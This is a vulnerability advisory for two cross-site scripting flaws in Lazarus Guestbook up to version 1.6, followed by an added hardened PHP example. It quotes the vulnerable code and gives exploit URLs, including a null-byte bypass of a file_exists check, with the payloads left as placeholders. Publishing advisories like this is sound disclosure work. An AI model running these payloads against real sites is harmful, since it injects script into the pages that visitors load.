Lazarus Guestbook Cross Site Scripting Vulnerabilities



Product : Lazarus Guestbook
Website : http://carbonize.co.uk/Lazarus/
Version : <= 1.6
Problem : Cross Site Scripting

1)
The first problem is in lang/codes-english.php: the "show" parameter is not properly sanitised before it is echoed.
This can be exploited to execute arbitrary HTML and JavaScript code.

Vulnerable code in lang/codes-english.php near line 4:

1
2
3
4  <?php echo($_GET['show']); ?>

Exploit :

http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3E[XSS]
http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3E


2)
The second problem is in picture.php: the script first verifies that the image file exists and then displays it.

Vulnerable code in picture.php:
********************************

24  if (!empty($_GET['img'])) {
26      if (file_exists("$GB_TMP/$_GET[img]")) {
27          $size = @GetImageSize("$GB_TMP/$_GET[img]");
28          $picture = "$GB_PG[base_url]/$GB_TMP/$_GET[img]";
29      }
..      ............
49
50      \n";
53        }
54    ?>
55

****************
    If magic_quotes_gpc is off, this check can be bypassed by specifying an existing image file (example: "img/home.gif") followed by a null character (%00).

POC : http://localhost/lazarusgb/picture.php?img=../img/home.gif%00[code]

    file_exists("$GB_TMP/$_GET[img]") will return true, and the HTML code after the null byte is reflected into the page and executed.

    Exploit:

http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E[XSS]
http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E
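A hardened version of both vulnerable patterns above, added here as an example (not code from the advisory or from the Lazarus project). $GB_TMP and $GB_PG are the advisory's variable names; the image directory, base URL, function names and the constructed requests at the end are assumptions.

```php
<?php
// Added example, not code from the advisory or from Lazarus: a hardened
// version of the two patterns the advisory describes. $GB_TMP and $GB_PG
// are the names used in the quoted code; the paths, URL and function
// names are assumptions.
declare(strict_types=1);

$GB_TMP = __DIR__ . '/tmp';                                  // assumed
$GB_PG  = ['base_url' => 'http://localhost/lazarusgb'];      // assumed

// Issue 1: request data must be escaped for the HTML context it lands in,
// so a value such as "</title>[XSS]" is rendered as inert text.
function safe_show(array $get): string
{
    $show = (isset($get['show']) && is_string($get['show'])) ? $get['show'] : '';
    return htmlspecialchars($show, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Issue 2: file_exists() is not an authorisation check. Reject control
// bytes (the %00 truncation relies on one), allow only a bare file name,
// confine the resolved path to the image directory, require a real image,
// and escape the value before it is placed in an attribute.
function safe_picture_tag(array $get, string $tmpDir, string $baseUrl): ?string
{
    if (empty($get['img']) || !is_string($get['img'])) {
        return null;
    }
    $img = $get['img'];
    if (preg_match('/[\x00-\x1f\\\\]/', $img) || basename($img) !== $img) {
        return null;                 // null byte, control char, backslash or path component
    }
    $root = realpath($tmpDir);
    $path = realpath($tmpDir . DIRECTORY_SEPARATOR . $img);
    if ($root === false || $path === false
        || strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;                 // outside the image directory
    }
    if (@getimagesize($path) === false) {
        return null;                 // not an image, whatever its name says
    }
    $src = htmlspecialchars($baseUrl . '/tmp/' . $img, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<img src="' . $src . '" alt="">';
}

// Constructed requests mirroring the advisory's two payload shapes.
$reflected = safe_show(['show' => '</title>[XSS]']);
// $reflected contains &lt;/title&gt;[XSS]: no tag reaches the HTML parser.
$tag = safe_picture_tag(['img' => "../img/home.gif\0\">"], $GB_TMP, $GB_PG['base_url']);
// $tag === null: the null byte is rejected before any filesystem call is made.
```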
Contact : simo64[at]gmail[dot]com=0D
Moroccan Security Research Team
